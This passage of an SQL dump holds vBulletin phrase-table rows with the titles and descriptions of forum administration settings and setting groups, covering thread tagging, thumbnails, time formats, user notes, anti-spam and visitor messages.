(39514, -1, 'setting_threadsubscribed_desc', 'vbsettings', 'If enabled, this option will notify the user that they are subscribed to a thread by displaying a small icon when viewing forumdisplay and search results. It will also change the \"Subscribe to this thread\" text on showthread to \"Unsubscribe from this thread\". This can have an effect on performance. ', 'vbulletin', '', 0, ''),
(39515, -1, 'setting_threadsubscribed_title', 'vbsettings', 'Check Thread Subscription', 'vbulletin', '', 0, ''),
(39516, -1, 'setting_threadtagging_desc', 'vbsettings', 'This is a global option to enable or disable the thread tagging system. You may choose which usergroups can apply tags to threads in the usergroup permissions section.', 'vbulletin', 'vBulletin Solutions', 1196440354, '3.7.0 Beta 1'),
(39517, -1, 'setting_threadtagging_title', 'vbsettings', 'Enable Thread Tagging', 'vbulletin', 'vBulletin Solutions', 1196440354, '3.7.0 Beta 1'),
(39518, -1, 'setting_threadtitlescore_desc', 'vbsettings', 'Score for a word appearing in the thread title.', 'vbulletin', 'vBulletin Solutions', 1185233737, '3.6.8'),
(39519, -1, 'setting_threadtitlescore_title', 'vbsettings', 'Search Relevance Thread Title Score', 'vbulletin', 'vBulletin Solutions', 1185233737, '3.6.8'),
(39520, -1, 'setting_threadviewslive_desc', 'vbsettings', 'Option to update thread views immediately, or once an hour. If you have a large forum, you will probably want to disable immediate updates, since they are quite server intensive.', 'vbulletin', '', 0, ''),
(39521, -1, 'setting_threadviewslive_title', 'vbsettings', 'Update Thread Views Immediately', 'vbulletin', '', 0, ''),
(39522, -1, 'setting_threadvoted_desc', 'vbsettings', 'If enabled, this option will check if a user voted on a thread and show their vote if they have. Otherwise, they will see the voting options even if they are not able to vote again. This can have an effect on performance. ', 'vbulletin', 'vBulletin Solutions', 1177625958, '3.6.6'),
(39523, -1, 'setting_threadvoted_title', 'vbsettings', 'Check Thread Rating', 'vbulletin', '', 0, ''),
(39524, -1, 'setting_thumbcolor_desc', 'vbsettings', 'This setting controls the border and label color in the Thumbnail Creation option above. Please specify the color using standard Web Colors .', 'vbulletin', 'vBulletin Solutions', 1154701108, '3.6.1'),
(39525, -1, 'setting_thumbcolor_title', 'vbsettings', 'Thumbnail Color', 'vbulletin', 'vBulletin Solutions', 1154701108, '3.6.1'),
(39526, -1, 'setting_thumbquality_desc', 'vbsettings', 'Quality of JPG thumbnails. 75 is a good balance between file size and image quality.', 'vbulletin', 'vBulletin Solutions', 1199365609, '3.7.0 Beta 4'),
(39527, -1, 'setting_thumbquality_title', 'vbsettings', 'Thumbnail Quality', 'vbulletin', 'vBulletin Solutions', 1199365609, '3.7.0 Beta 4'),
(39528, -1, 'setting_timeformat_desc', 'vbsettings', 'Format in which the time is presented on all vBulletin pages: \r\n \r\nSee: http://www.php.net/manual-lookup.php?function=date \r\n \r\nExamples: \r\nAM/PM Time Format (eg, 11:15 PM): h:i A \r\n24-Hour Format Time (eg, 23:15): H:i', 'vbulletin', '', 0, ''),
(39529, -1, 'setting_timeformat_title', 'vbsettings', 'Format For Time', 'vbulletin', '', 0, ''),
(39530, -1, 'setting_timeoffset_desc', 'vbsettings', 'Time zone offset for guests and new users. Do not take DST into consideration, rather use the next option to enable/disable DST.', 'vbulletin', '', 0, ''),
(39531, -1, 'setting_timeoffset_title', 'vbsettings', 'Default Time Zone Offset', 'vbulletin', '', 0, ''),
(39532, -1, 'setting_timeoutcontrolpanel_desc', 'vbsettings', 'After a period of inactivity, Administrators are logged out of the Admin Control Panel. If this option is set to yes, the inactivity period will be the same as the Cookie Timeout setting found in vBulletin Options -> Help Cookies and HTTP Header Options (defaults to 15 minutes). If this option is disabled, then the period will be one hour.\r\n Logins to the admincp are more secure with this enabled.', 'vbulletin', '', 0, ''),
(39533, -1, 'setting_timeoutcontrolpanel_title', 'vbsettings', 'Timeout Admin Login', 'vbulletin', '', 0, ''),
(39534, -1, 'setting_titlemaxchars_desc', 'vbsettings', 'Thread and post titles will be limited to this number of characters.\r\n\r\nPlease choose a value larger than 0 and less than 251.', 'vbulletin', 'vBulletin Solutions', 1199365455, '3.7.0 Beta 4'),
(39535, -1, 'setting_titlemaxchars_title', 'vbsettings', 'Maximum Characters Per Thread/Post Title', 'vbulletin', 'vBulletin Solutions', 1199365455, '3.7.0 Beta 4'),
(39536, -1, 'setting_tmppath_desc', 'vbsettings', 'If your server is running in PHP Safe Mode, you\'ll need to specify a directory that is CHMOD to 777 that will act as a temporary directory for uploads. All files are removed from this directory after database insertion. \r\n \r\nNote: Do NOT include the trailing slash (\'/\') after the directory name.', 'vbulletin', '', 0, ''),
(39537, -1, 'setting_tmppath_title', 'vbsettings', 'Safe Mode Temporary Directory', 'vbulletin', '', 0, ''),
(39538, -1, 'setting_tosurl_desc', 'vbsettings', 'Enter the URL of your terms of service, if you have one.', 'vbulletin', 'vBulletin Solutions', 1218457592, '3.8.0 Alpha 1'),
(39539, -1, 'setting_tosurl_title', 'vbsettings', 'Terms of Service URL', 'vbulletin', 'vBulletin Solutions', 1218457592, '3.8.0 Alpha 1'),
(39540, -1, 'setting_uiforumid_desc', 'vbsettings', 'A discussion thread can be created for each user infraction for moderators to discuss the infraction further. Choose a forum for the discussion threads to be created in.', 'vbulletin', 'vBulletin Solutions', 1149539022, '3.6.0 Beta 1'),
(39541, -1, 'setting_uiforumid_title', 'vbsettings', 'User Infraction Discussion Forum', 'vbulletin', 'vBulletin Solutions', 1149539022, '3.6.0 Beta 1'),
(39542, -1, 'setting_uimessage_desc', 'vbsettings', 'This option requires that the user sending an infraction include a PM or Email, depending on your forum settings.', 'vbulletin', 'vBulletin Solutions', 1149894363, '3.6.0 Beta 2'),
(39543, -1, 'setting_uimessage_title', 'vbsettings', 'Require Infraction Message', 'vbulletin', 'vBulletin Solutions', 1149894363, '3.6.0 Beta 2'),
(39544, -1, 'setting_unallowhtml_desc', 'vbsettings', 'Allow raw HTML code to be used in user notes? (Strongly not recommended. )', 'vbulletin', '', 0, ''),
(39545, -1, 'setting_unallowhtml_title', 'vbsettings', 'Allow HTML in User Notes', 'vbulletin', '', 0, ''),
(39546, -1, 'setting_unallowimg_desc', 'vbsettings', 'Allow [IMG] code to be used in user notes?', 'vbulletin', '', 0, ''),
(39547, -1, 'setting_unallowimg_title', 'vbsettings', 'Allow [IMG] Code in User Notes', 'vbulletin', '', 0, ''),
(39548, -1, 'setting_unallowsmilies_desc', 'vbsettings', 'Allow smilies to be used in user notes?', 'vbulletin', '', 0, ''),
(39549, -1, 'setting_unallowsmilies_title', 'vbsettings', 'Allow Smilies in User Notes', 'vbulletin', '', 0, ''),
(39550, -1, 'setting_unallowvbcode_desc', 'vbsettings', 'Allow BB code to be used in user notes? (Such as [b], [i] etc.)', 'vbulletin', 'vBulletin Solutions', 1206965584, '3.7.0 Release Candidate 2'),
(39551, -1, 'setting_unallowvbcode_title', 'vbsettings', 'Allow BB Code in User Notes', 'vbulletin', 'vBulletin Solutions', 1195475617, '3.7.0 Beta 1'),
(39552, -1, 'setting_updatelastpost_desc', 'vbsettings', 'If you set this option to \'Yes\' the thread\'s last post time will be updated when a vote is placed, thereby returning it to the top of its parent forum listing. \r\n \r\nNote that this option can cause confusion. The last post time of a thread will be changed with no visible post.', 'vbulletin', 'vBulletin Solutions', 1205772792, '3.7.0 Release Candidate 1'),
(39553, -1, 'setting_updatelastpost_title', 'vbsettings', 'Update Thread Last Post on Poll Vote', 'vbulletin', 'vBulletin Solutions', 1205772792, '3.7.0 Release Candidate 1'),
(39554, -1, 'setting_use_smtp_desc', 'vbsettings', 'Set this option to yes to use an SMTP server rather than the internal PHP mail() function.', 'vbulletin', 'vBulletin Solutions', 1150742206, '3.6.0 Beta 3'),
(39555, -1, 'setting_use_smtp_title', 'vbsettings', 'SMTP Email', 'vbulletin', '', 0, ''),
(39556, -1, 'setting_usebulkheader_desc', 'vbsettings', 'Mail servers using Exchange will send auto responders unless you mark your email as bulk mail. While there is no documented case of emails being marked as spam directly due to this header, there is no guarantee what other mail servers will do with this header. \r\n \r\nSet this option to \'yes\' if you are getting tired of all the auto responders in your webmaster email from Exchange servers.', 'vbulletin', 'vBulletin Solutions', 1249403419, '3.8.3'),
(39557, -1, 'setting_usebulkheader_title', 'vbsettings', 'Use Bulk Header?', 'vbulletin', 'vBulletin Solutions', 1249403419, '3.8.3'),
(39558, -1, 'setting_usecoppa_desc', 'vbsettings', 'Use the COPPA registration system. This complies with the COPPA laws and requires children under the age of 13 to get parental consent before they can post. \r\n \r\nFor more info about this law, see here:\r\nhttp://www.vbulletin.com/go/coppa ', 'vbulletin', 'vBulletin Solutions', 1231760784, '3.8.1'),
(39559, -1, 'setting_usecoppa_title', 'vbsettings', 'COPPA Registration System', 'vbulletin', 'vBulletin Solutions', 1144879373, '3.6.0 Beta 1'),
(39560, -1, 'setting_usefileavatar_desc', 'vbsettings', 'Leave this setting alone.', 'vbulletin', 'vBulletin Solutions', 1148682855, '3.6.0 Beta 1'),
(39561, -1, 'setting_usefileavatar_title', 'vbsettings', 'Save Avatars as Files', 'vbulletin', 'vBulletin Solutions', 1148682855, '3.6.0 Beta 1'),
(39562, -1, 'setting_usefilegroupicon_desc', 'vbsettings', 'Leave this setting alone.', 'vbulletin', 'vBulletin Solutions', 1216828433, '3.8.0 Alpha 1'),
(39563, -1, 'setting_usefilegroupicon_title', 'vbsettings', 'Save Social Group Icons as Files', 'vbulletin', 'vBulletin Solutions', 1216828455, '3.8.0 Alpha 1'),
(39564, -1, 'setting_useforumjump_desc', 'vbsettings', 'If you have a lot of forums you may want to disable the Forum Jump menu, although it makes only a marginal performance hit, it can generate a large amount of HTML.', 'vbulletin', '', 0, ''),
(39565, -1, 'setting_useforumjump_title', 'vbsettings', 'Use Forum Jump Menu', 'vbulletin', '', 0, ''),
(39566, -1, 'setting_useheaderredirect_desc', 'vbsettings', 'Enabling this option will remove the update pages that are displayed after a user makes a post, starts a search, etc. These pages provide assurance to the user that their information has been processed by the forum. Disabling these pages will save you bandwidth and may lessen the load of the forum on your server.\r\n \r\nNote: Some pages will still use the redirection page when cookies are involved to prevent some potential problems.', 'vbulletin', '', 0, ''),
(39567, -1, 'setting_useheaderredirect_title', 'vbsettings', 'Remove Redirection Message Pages', 'vbulletin', '', 0, ''),
(39568, -1, 'setting_usehotthreads_desc', 'vbsettings', 'Hot threads indicate threads with a lot of activity.', 'vbulletin', '', 0, ''),
(39569, -1, 'setting_usehotthreads_title', 'vbsettings', 'Hot Threads Enabled', 'vbulletin', '', 0, ''),
(39570, -1, 'setting_usemailqueue_desc', 'vbsettings', 'When enabled, subscription emails generated by your site will be processed in batches to lessen the load on your server. Account activation, lost passwords and other vital emails are sent instantly regardless of this setting. If your site has low traffic, subscription emails may be delayed.\r\n \r\nIf you have a large site, you may wish to enable locking. This prevents a rare situation where the same email is sent multiple times.', 'vbulletin', '', 0, ''),
(39571, -1, 'setting_usemailqueue_title', 'vbsettings', 'Use Mailqueue System', 'vbulletin', '', 0, ''),
(39572, -1, 'setting_usememberlistadvsearch_desc', 'vbsettings', 'Allow the use of the advanced search tool for the Member List.', 'vbulletin', 'vBulletin Solutions', 1195216840, '3.7.0 Beta 1'),
(39573, -1, 'setting_usememberlistadvsearch_title', 'vbsettings', 'Allow Advanced Searches', 'vbulletin', 'vBulletin Solutions', 1195216840, '3.7.0 Beta 1'),
(39574, -1, 'setting_usepopups_desc', 'vbsettings', 'Use dynamic HTML popup menus to reduce screen clutter if user\'s browser is capable? \r\n \r\nPlease note that disabling this option will also disable some AJAX features, such as user name suggestion.', 'vbulletin', '', 0, ''),
(39575, -1, 'setting_usepopups_title', 'vbsettings', 'Use \'vBMenu\' DHTML Popup Menus?', 'vbulletin', '', 0, ''),
(39576, -1, 'setting_usercss_allowed_border_widths_desc', 'vbsettings', 'The list of allowed border width sizes for profile style customizations. Put each border width size on its own line.', 'vbulletin', 'vBulletin Solutions', 1196181678, '3.7.0 Beta 1'),
(39577, -1, 'setting_usercss_allowed_border_widths_title', 'vbsettings', 'Allowed Border Widths', 'vbulletin', 'vBulletin Solutions', 1196181678, '3.7.0 Beta 1'),
(39578, -1, 'setting_usercss_allowed_font_sizes_desc', 'vbsettings', 'The list of allowed fonts size for profile style customizations. Put each font size on its own line. You may use any size that is valid in CSS.', 'vbulletin', 'vBulletin Solutions', 1196181651, '3.7.0 Beta 1'),
(39579, -1, 'setting_usercss_allowed_font_sizes_title', 'vbsettings', 'Allowed Font Sizes', 'vbulletin', 'vBulletin Solutions', 1196181651, '3.7.0 Beta 1'),
(39580, -1, 'setting_usercss_allowed_fonts_desc', 'vbsettings', 'The list of allowed fonts for profile style customizations. Put each font on its own line.', 'vbulletin', 'vBulletin Solutions', 1196181600, '3.7.0 Beta 1'),
(39581, -1, 'setting_usercss_allowed_fonts_title', 'vbsettings', 'Allowed Fonts', 'vbulletin', 'vBulletin Solutions', 1196181600, '3.7.0 Beta 1'),
(39582, -1, 'setting_usercss_allowed_padding_desc', 'vbsettings', 'The list of allowed padding sizes for profile style customizations. Put each padding size on its own line.', 'vbulletin', 'vBulletin Solutions', 1198246205, '3.7.0 Beta 4'),
(39583, -1, 'setting_usercss_allowed_padding_title', 'vbsettings', 'Allowed Padding', 'vbulletin', 'vBulletin Solutions', 1198246205, '3.7.0 Beta 4'),
(39584, -1, 'setting_usereferrer_desc', 'vbsettings', 'If you enable the User Referrer system, then a user who visits your forum through a link that contains \'referrerid=XXX\' will give referral credit to the owner of the referrerid when they register (where XXX is the userid of the referring user).', 'vbulletin', '', 0, ''),
(39585, -1, 'setting_usereferrer_title', 'vbsettings', 'User Referrer', 'vbulletin', '', 0, ''),
(39586, -1, 'setting_usermaxposts_desc', 'vbsettings', 'If you would like to allow the user to set their own maximum posts per thread then give the options separated by commas. Leave this option blank to force users to use the \'Maximum Displayed Posts Before Page Split\' setting above this option. \r\n \r\nExample setting: 10,20,30,40', 'vbulletin', '', 0, ''),
(39587, -1, 'setting_usermaxposts_title', 'vbsettings', 'User-Settable Maximum Displayed Posts', 'vbulletin', '', 0, ''),
(39588, -1, 'setting_usernameregex_desc', 'vbsettings', 'You may require the username to match a regular expression (PCRE ). The admin help provides some examples that may be useful. To disable this function leave the option blank.', 'vbulletin', 'vBulletin Solutions', 1190377568, '3.7.0 Beta 1'),
(39589, -1, 'setting_usernameregex_title', 'vbsettings', 'Username Regular Expression', 'vbulletin', 'vBulletin Solutions', 1149258323, '3.6.0 Beta 1'),
(39590, -1, 'setting_usernamereusedelay_desc', 'vbsettings', 'When a username is changed, you may wish to prevent users from registering with that name for a certain length of time. \r\n \r\nEnter the number of days which an old username is reserved for. (Use 0 to disable.)', 'vbulletin', 'vBulletin Solutions', 1199365228, '3.7.0 Beta 4'),
(39591, -1, 'setting_usernamereusedelay_title', 'vbsettings', 'Username Reuse Delay', 'vbulletin', 'vBulletin Solutions', 1199365228, '3.7.0 Beta 4'),
(39592, -1, 'setting_usestrikesystem_desc', 'vbsettings', 'Setting this to no will disable the system that prevents a user (with a specific IP address) from logging into an account after entering an incorrect password 5 times.', 'vbulletin', '', 0, ''),
(39593, -1, 'setting_usestrikesystem_title', 'vbsettings', 'Use Login \"Strikes\" System', 'vbulletin', '', 0, ''),
(39594, -1, 'setting_vb_antispam_key_desc', 'vbsettings', 'Enter a vBulletin Anti-Spam service key to enable scanning of user data where supported.', 'vbulletin', 'vBulletin Solutions', 1239102441, '3.8.3'),
(39595, -1, 'setting_vb_antispam_key_title', 'vbsettings', 'vBulletin Anti-Spam Key', 'vbulletin', 'vBulletin Solutions', 1239102441, '3.8.3'),
(39596, -1, 'setting_vb_antispam_posts_desc', 'vbsettings', 'This setting controls how many of a user\'s posts will be scanned by the Anti-Spam Service. Once a user\'s post count exceeds this threshold, his or her posts will not be scanned for spam content. To always scan posts set this value to 0.', 'vbulletin', 'vBulletin Solutions', 1207919113, '3.7.0 Release Candidate 4'),
(39597, -1, 'setting_vb_antispam_posts_title', 'vbsettings', 'Spam Scanning Post Threshold', 'vbulletin', 'vBulletin Solutions', 1207919113, '3.7.0 Release Candidate 4'),
(39598, -1, 'setting_vb_antispam_type_desc', 'vbsettings', 'Controls the service that is used for scanning supported data. The corresponding API key for the service has to be entered.', 'vbulletin', 'vBulletin Solutions', 1221045710, '3.8.0 Alpha 1'),
(39599, -1, 'setting_vb_antispam_type_title', 'vbsettings', 'Anti-Spam Service', 'vbulletin', 'vBulletin Solutions', 1221045710, '3.8.0 Alpha 1'),
(39600, -1, 'setting_verifyemail_desc', 'vbsettings', 'If you set this option to \'Yes\' new members will not be allowed to post messages until they visit a link that is sent to them in an email when they sign up. \r\n \r\nIf a user\'s account is not activated by the user visiting the link, it will remain in the \'Users Awaiting Activation\' usergroup.', 'vbulletin', '', 0, ''),
(39601, -1, 'setting_verifyemail_title', 'vbsettings', 'Verify Email address in Registration', 'vbulletin', '', 0, ''),
(39602, -1, 'setting_viewattachedimages_desc', 'vbsettings', 'If thumbnails are enabled, any image without a thumbnail will be shown as a link, regardless of this setting\'s status, unless the image size happens to be within the thumbnail size limits. Set this to \'No\' if you want to preserve bandwidth or server processor resources.', 'vbulletin', '', 0, ''),
(39603, -1, 'setting_viewattachedimages_title', 'vbsettings', 'View Attached Images Inline', 'vbulletin', '', 0, ''),
(39604, -1, 'setting_viewfunc_desc', 'vbsettings', 'Allows you to specify a function to operate on the number of views of a thread. \r\nWorks like: = func($thread[views]) * $viewscore', 'vbulletin', 'vBulletin Solutions', 1185233737, '3.6.8'),
(39605, -1, 'setting_viewfunc_title', 'vbsettings', 'Search Relevance Views Function', 'vbulletin', 'vBulletin Solutions', 1185233737, '3.6.8'),
(39606, -1, 'setting_viewscore_desc', 'vbsettings', 'Amount to multiply the number of views of a thread to get the score for the thread.', 'vbulletin', 'vBulletin Solutions', 1185233737, '3.6.8'),
(39607, -1, 'setting_viewscore_title', 'vbsettings', 'Search Relevance View Score', 'vbulletin', 'vBulletin Solutions', 1185233737, '3.6.8'),
(39608, -1, 'setting_vm_allowed_bbcode_desc', 'vbsettings', 'This setting allows you to enable and disable the use of various BB codes in visitor messages. \r\n \r\nNote that any changes you make will only affect messages posted (or edited) after this point.', 'vbulletin', 'vBulletin Solutions', 1205422204, '3.7.0 Release Candidate 1'),
(39609, -1, 'setting_vm_allowed_bbcode_title', 'vbsettings', 'Allowed BB Code Tags in Visitor Messages', 'vbulletin', 'vBulletin Solutions', 1205422204, '3.7.0 Release Candidate 1'),
(39610, -1, 'setting_vm_maxchars_desc', 'vbsettings', 'Maximum characters to allow in a visitor message. \r\n \r\nSet this to 0 for no limit.', 'vbulletin', 'vBulletin Solutions', 1199365332, '3.7.0 Beta 4'),
(39611, -1, 'setting_vm_maxchars_title', 'vbsettings', 'Maximum Characters Per Visitor Message', 'vbulletin', 'vBulletin Solutions', 1199365332, '3.7.0 Beta 4'),
(39612, -1, 'setting_vm_maxperpage_desc', 'vbsettings', 'This setting allows you to limit the number of messages users may display per page in the user profiles. \r\n \r\nNote: This number must be at least 1.', 'vbulletin', 'vBulletin Solutions', 1208954851, '3.7.0 Release Candidate 4'),
(39613, -1, 'setting_vm_maxperpage_title', 'vbsettings', 'Maximum Visitor Messages Per-Page', 'vbulletin', 'vBulletin Solutions', 1208954851, '3.7.0 Release Candidate 4'),
(39614, -1, 'setting_vm_moderation_desc', 'vbsettings', 'When enabled, all new visitor messages are placed into moderation. This can also be enabled in usergroup permissions.', 'vbulletin', 'vBulletin Solutions', 1197300381, '3.7.0 Beta 1'),
(39615, -1, 'setting_vm_moderation_title', 'vbsettings', 'Visitor Message Moderation', 'vbulletin', 'vBulletin Solutions', 1197300381, '3.7.0 Beta 1'),
(39616, -1, 'setting_vm_perpage_desc', 'vbsettings', 'This setting allows you to define the default number of messages displayed per-page in the user profiles. \r\n \r\nNote: This number must be at least 1.', 'vbulletin', 'vBulletin Solutions', 1208954844, '3.7.0 Release Candidate 4'),
(39617, -1, 'setting_vm_perpage_title', 'vbsettings', 'Default Visitor Messages Per-Page', 'vbulletin', 'vBulletin Solutions', 1208954844, '3.7.0 Release Candidate 4'),
(39618, -1, 'setting_votechange_desc', 'vbsettings', 'Allow users to change their original rating of a thread?', 'vbulletin', '', 0, ''),
(39619, -1, 'setting_votechange_title', 'vbsettings', 'Allow Thread Rating Vote Changes', 'vbulletin', '', 0, ''),
(39620, -1, 'setting_webmasteremail_desc', 'vbsettings', 'Email address of the webmaster.', 'vbulletin', '', 0, ''),
(39621, -1, 'setting_webmasteremail_title', 'vbsettings', 'Webmaster\'s Email', 'vbulletin', '', 0, ''),
(39622, -1, 'setting_welcomemail_desc', 'vbsettings', 'Enabling this option will send a welcome email to new users. To alter or translate this email, use the following links: [Email Title ] [Email Body ] \r\n \r\nNote: If you require emails to be verified, this email will be sent after the user has activated his or her account. If you moderate new memberships, no welcome mail will be sent as the user will already be receiving an email.', 'vbulletin', 'vBulletin Solutions', 1150107133, '3.6.0 Beta 2'),
(39623, -1, 'setting_welcomemail_title', 'vbsettings', 'Send Welcome Email', 'vbulletin', 'vBulletin Solutions', 1150107133, '3.6.0 Beta 2'),
(39624, -1, 'setting_welcomepm_desc', 'vbsettings', 'Enabling this option will send a welcome private message to new users. Please input the username of the user that this PM is to be sent from. To alter or translate this message, use the following links: [PM Title ] [PM Body ] \r\n \r\nNote: If you require emails to be verified, this message will be sent after the user has activated his or her account. Also ensure that Receive Private Messages is enabled in Default Registration Options below.', 'vbulletin', 'vBulletin Solutions', 1150107164, '3.6.0 Beta 2'),
(39625, -1, 'setting_welcomepm_title', 'vbsettings', 'Welcome Private Message', 'vbulletin', 'vBulletin Solutions', 1150107164, '3.6.0 Beta 2'),
(39626, -1, 'setting_wordwrap_desc', 'vbsettings', 'If you want posts to automatically insert spaces into long words to make them wrap after a certain number of characters, set the number of characters in the box above. \r\n \r\nIf you do not want this to occur, enter 0.', 'vbulletin', 'vBulletin Solutions', 1199365797, '3.7.0 Beta 4'),
(39627, -1, 'setting_wordwrap_title', 'vbsettings', 'Number of Characters Before Wrapping Text', 'vbulletin', 'vBulletin Solutions', 1199365797, '3.7.0 Beta 4'),
(39628, -1, 'setting_wysiwyg_smtotal_desc', 'vbsettings', 'Use this option to set the number of smilies that will appear in the WYSIWYG popup smilie menu before the \'show all smilies\' link is displayed. \r\n \r\nSet this value to 0 if you would like to hide the popup smilie menu completely.', 'vbulletin', 'vBulletin Solutions', 1199365557, '3.7.0 Beta 4'),
(39629, -1, 'setting_wysiwyg_smtotal_title', 'vbsettings', 'Smilie Menu Total Smilies', 'vbulletin', 'vBulletin Solutions', 1199365557, '3.7.0 Beta 4'),
(39630, -1, 'setting_yestoday_desc', 'vbsettings', 'This option controls the display of dates throughout your forum \'Normal\' uses the date and time formats below this option. \r\n \r\n\'Yesterday / Today\' will show \'Yesterday\' and \'Today\' for dates that fall in those periods. \r\n \r\n\'Detailed\' will show times such as \'1 Minute Ago\', \'1 Hour Ago\', \'1 Day Ago\', and \'1 Week Ago\'.', 'vbulletin', '', 0, ''),
(39631, -1, 'setting_yestoday_title', 'vbsettings', 'Datestamp Display Option', 'vbulletin', '', 0, ''),
(39632, -1, 'settinggroup_address', 'vbsettings', 'Site Name / URL / Contact Details', 'vbulletin', '', 0, ''),
(39633, -1, 'settinggroup_admincp', 'vbsettings', 'Admin Control Panel Options', 'vbulletin', '', 0, ''),
(39634, -1, 'settinggroup_archive', 'vbsettings', 'Search Engine Friendly Archive', 'vbulletin', '', 0, ''),
(39635, -1, 'settinggroup_attachment', 'vbsettings', 'Message Attachment Options', 'vbulletin', '', 0, ''),
(39636, -1, 'settinggroup_banning', 'vbsettings', 'User Banning Options', 'vbulletin', '', 0, ''),
(39637, -1, 'settinggroup_bbcode', 'vbsettings', 'BB Code Settings', 'vbulletin', '', 0, ''),
(39638, -1, 'settinggroup_censor', 'vbsettings', 'Censorship Options', 'vbulletin', '', 0, ''),
(39639, -1, 'settinggroup_datetime', 'vbsettings', 'Date and Time Options', 'vbulletin', '', 0, ''),
(39640, -1, 'settinggroup_email', 'vbsettings', 'Email Options', 'vbulletin', '', 0, ''),
(39641, -1, 'settinggroup_errorhandling', 'vbsettings', 'Error Handling & Logging', 'vbulletin', '', 0, ''),
(39642, -1, 'settinggroup_external', 'vbsettings', 'External Data Provider', 'vbulletin', '', 0, ''),
(39643, -1, 'settinggroup_forumdisplay', 'vbsettings', 'Forum Display Options (forumdisplay)', 'vbulletin', '', 0, ''),
(39644, -1, 'settinggroup_forumhome', 'vbsettings', 'Forums Home Page Options', 'vbulletin', '', 0, ''),
(39645, -1, 'settinggroup_forumlist', 'vbsettings', 'Forum Listings Display Options', 'vbulletin', '', 0, ''),
(39646, -1, 'settinggroup_general', 'vbsettings', 'General Settings', 'vbulletin', '', 0, ''),
(39647, -1, 'settinggroup_http', 'vbsettings', 'Cookies and HTTP Header Options', 'vbulletin', '', 0, ''),
(39648, -1, 'settinggroup_humanverification', 'vbsettings', 'Human Verification Options', 'vbulletin', 'vBulletin Solutions', 1192206757, '3.7.0 Beta 1'),
(39649, -1, 'settinggroup_imagesettings', 'vbsettings', 'Image Settings', 'vbulletin', '', 0, ''),
(39650, -1, 'settinggroup_memberlist', 'vbsettings', 'User Listing Options', 'vbulletin', 'vBulletin Solutions', 1195216840, '3.7.0 Beta 1'),
(39651, -1, 'settinggroup_online', 'vbsettings', 'Who\'s Online Options', 'vbulletin', '', 0, ''),
(39652, -1, 'settinggroup_onoff', 'vbsettings', 'Turn Your vBulletin On and Off', 'vbulletin', '', 0, ''),
(39653, -1, 'settinggroup_paidsubs', 'vbsettings', 'Paid Subscriptions', 'vbulletin', 'vBulletin Solutions', 1147373676, '3.6.0 Beta 1'),
(39654, -1, 'settinggroup_plugin', 'vbsettings', 'Plugin/Hook System', 'vbulletin', '', 0, ''),
(39655, -1, 'settinggroup_pm', 'vbsettings', 'Private Messaging Options', 'vbulletin', '', 0, ''),
(39656, -1, 'settinggroup_poll', 'vbsettings', 'Poll and Thread Rating Options', 'vbulletin', '', 0, ''),
(39657, -1, 'settinggroup_postiface', 'vbsettings', 'Message Posting Interface Options', 'vbulletin', '', 0, ''),
(39658, -1, 'settinggroup_posting', 'vbsettings', 'Message Posting and Editing Options', 'vbulletin', '', 0, ''),
(39659, -1, 'settinggroup_profile_customization', 'vbsettings', 'User Profile: Style Customization Options', 'vbulletin', 'vBulletin Solutions', 1195216696, '3.7.0 Beta 1'),
(39660, -1, 'settinggroup_register', 'vbsettings', 'User Registration Options', 'vbulletin', '', 0, ''),
(39661, -1, 'settinggroup_reputation', 'vbsettings', 'User Reputation Options', 'vbulletin', '', 0, ''),
(39662, -1, 'settinggroup_search', 'vbsettings', 'Message Searching Options', 'vbulletin', '', 0, ''),
(39663, -1, 'settinggroup_search_default', 'vbsettings', 'Message Searching Options (vBulletin Internal Search)', 'vbulletin', 'vBulletin Solutions', 1185233710, '3.6.8'),
(39664, -1, 'settinggroup_searchfunc', 'vbsettings', 'Message Searching Relevance Options (vBulletin Internal Search)', 'vbulletin', 'vBulletin Solutions', 1185233737, '3.6.8'),
(39665, -1, 'settinggroup_server', 'vbsettings', 'Server Settings and Optimization Options', 'vbulletin', '', 0, ''),
(39666, -1, 'settinggroup_showthread', 'vbsettings', 'Thread Display Options (showthread)', 'vbulletin', '', 0, ''),
(39667, -1, 'settinggroup_social_groups', 'vbsettings', 'Social Group Options', 'vbulletin', 'vBulletin Solutions', 1205244265, '3.7.0 Release Candidate 1'),
(39668, -1, 'settinggroup_spam_management', 'vbsettings', 'Spam Management', 'vbulletin', 'vBulletin Solutions', 1200652550, '3.7.0 Beta 4'),
(39669, -1, 'settinggroup_stylelang', 'vbsettings', 'Style & Language Settings', 'vbulletin', '', 0, ''),
(39670, -1, 'settinggroup_tagging', 'vbsettings', 'Tagging Options', 'vbulletin', 'vBulletin Solutions', 1193066843, '3.7.0 Beta 1'),
(39671, -1, 'settinggroup_threadedmode', 'vbsettings', 'Threaded / Hybrid Mode Options (showthread)', 'vbulletin', '', 0, ''),
(39672, -1, 'settinggroup_user', 'vbsettings', 'User Profile Options', 'vbulletin', '', 0, ''),
(39673, -1, 'settinggroup_useralbum', 'vbsettings', 'User Profile: Album Options', 'vbulletin', 'vBulletin Solutions', 1195216632, '3.7.0 Beta 1'),
(39674, -1, 'settinggroup_userinfraction', 'vbsettings', 'User Infractions & Post Reporting Options', 'vbulletin', 'vBulletin Solutions', 1149539022, '3.6.0 Beta 1'),
(39675, -1, 'settinggroup_usernote', 'vbsettings', 'User Notes Options', 'vbulletin', '', 0, ''),
(39676, -1, 'settinggroup_userpix', 'vbsettings', 'User Picture Options', 'vbulletin', '', 0, ''),
(39677, -1, 'settinggroup_version', 'vbsettings', 'Version Info and Other Untouchables', 'vbulletin', '', 0, ''),
(39678, -1, 'settinggroup_visitor_message', 'vbsettings', 'User Profile: Visitor Messaging Options', 'vbulletin', 'vBulletin Solutions', 1197300381, '3.7.0 Beta 1'),
(39679, -1, 'your_forum_is_currently_using_default_search', 'vbsettings', 'Your forum is currently using the default search engine.\r\n \r\nTo enable the MySQL Fulltext search, we will issue the following two queries. If for some reason this process is unsuccessful, you will need to perform these queries manually. Please be patient as this can take from 10 seconds to an hour depending on the number of posts on your forum.\r\n \r\nALTER TABLE {1}post ADD FULLTEXT INDEX (title,pagetext)\r\nALTER TABLE {1}thread ADD FULLTEXT INDEX (title)\r\n{2}\r\n{3}', 'vbulletin', '', 0, ''),
(39680, -1, 'activating_registration', 'wol', 'Activating Registration', 'vbulletin', '', 0, ''),
(39681, -1, 'admin_control_panel_login', 'wol', 'Admin Control Panel Login', 'vbulletin', '', 0, ''),
(39682, -1, 'all', 'wol', 'All', 'vbulletin', '', 0, ''),
(39683, -1, 'choosing_forum_to_move_thread_to', 'wol', 'Choosing Forum to Move thread To', 'vbulletin', '', 0, ''),
